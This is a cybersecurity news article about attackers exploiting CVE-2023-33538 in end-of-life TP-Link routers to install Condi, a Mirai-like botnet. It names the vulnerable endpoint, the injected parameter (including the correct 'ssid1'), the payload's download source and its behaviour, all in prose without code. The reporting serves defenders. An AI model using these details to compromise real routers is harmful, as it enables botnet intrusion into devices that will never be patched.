Cybersecurity experts are raising alarms as hackers actively exploit a vulnerability in several obsolete TP-Link Wi-Fi routers by deploying Mirai-based malware. This security flaw, identified as CVE-2023-33538, affects multiple TP-Link models that no longer receive updates, leaving users exposed to attacks.
Affected Devices and Vulnerability Details
The routers vulnerable to this exploitation include the TL-WR940N (versions 2 and 4), TL-WR740N (versions 1 and 2), and TL-WR841N (versions 8 and 10). The problem lies in the routers’ web management interface, where a specific HTTP GET request parameter lacks proper validation against malicious inputs.
This oversight permits attackers to execute commands on the router without any alerts being triggered. The attack method involves sending harmful HTTP GET requests to the /userRpm/WlanNetworkRpm endpoint, embedding commands in the ssid parameter that the router processes unfiltered.
The Attack Mechanism and Malware Deployment
Once the router processes these malicious requests, it downloads an ELF binary named arm7 from a remote server located at IP address 51.38.137[.]113, assigns it execution permissions, and runs it immediately. This arm7 binary is a version of the Condi IoT botnet malware, known for its ties to Mirai-like botnet operations.
Researchers from Unit 42 at Palo Alto Networks discovered these attacks after the vulnerability was included in CISA’s Known Exploited Vulnerabilities (KEV) catalog in June 2025. Their findings revealed extensive automated attempts to exploit this vulnerability.
Malware Functionality and Further Spread
Post-infiltration, the arm7 binary performs tasks to maintain its presence on the device and expand the botnet. It communicates with a command-and-control (C2) server and can update itself by downloading fresh copies from the hard-coded IP. The binary also initiates an HTTP server on the infected device, enabling it to spread malware to other devices autonomously.
Despite some technical flaws in the hackers’ methods, the underlying vulnerability is confirmed to be genuine. Correctly executed attacks could successfully exploit these routers, although current attempts mistakenly target the ssid parameter instead of the correct ssid1.
Recommendations for Users
TP-Link has acknowledged the issue but confirmed that no patches will be provided, as these routers are end-of-life. They advise users to replace these devices with supported models and change default admin credentials, as exploitation requires authenticated access. Monitoring outbound traffic for connections to known malicious domains is also recommended.
For ongoing updates, follow us on Google News, LinkedIn, and X, and set CSN as your preferred source in Google.
